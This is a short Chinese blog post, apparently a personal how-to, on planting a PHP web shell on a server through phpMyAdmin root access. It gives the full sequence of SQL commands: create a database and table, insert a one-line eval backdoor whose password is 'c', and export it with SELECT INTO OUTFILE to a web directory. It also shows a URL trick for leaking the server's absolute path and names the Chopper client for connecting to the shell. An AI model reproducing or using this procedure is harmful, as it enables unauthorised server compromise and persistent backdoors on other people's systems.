标签归档:phpmyadmin

phpmyadmin root权限导shell的一个方法

把今晚的思路整理一下。

拿到了phpmyadmin root权限以后。

create database wutongyu(这个为数据库名称).
use wutongyu(连接数据库)

create table shell(code text) (建立表shell,字段code为文本型数据)

insert into shell(code) values (‘<?php @eval($_POST[‘c’]);?>’); 插入一句话,密码为C

 select * from shell into outfile “D:\\detai\\AppServ\\www\\phpMyAdmin2\\shell.php”   (导出shell到绝对路径)
这里说一下导出的时候的绝对路径获取方法:
在你默认的数据库登录地址后面加:libraries/select_lang.lib.php
例如你的是www.xxx.com/phpmyadmin。添加完之后的地址就是:
www.xxx.com/phpmyadmin/libraries/select_lang.lib.php

访问就会爆出绝对路径。

导出之后,一句话木马,用菜刀链接。

整个过程也算完成了,提权方式因环境而异。对提权目前我也不熟悉。这里不过多阐述。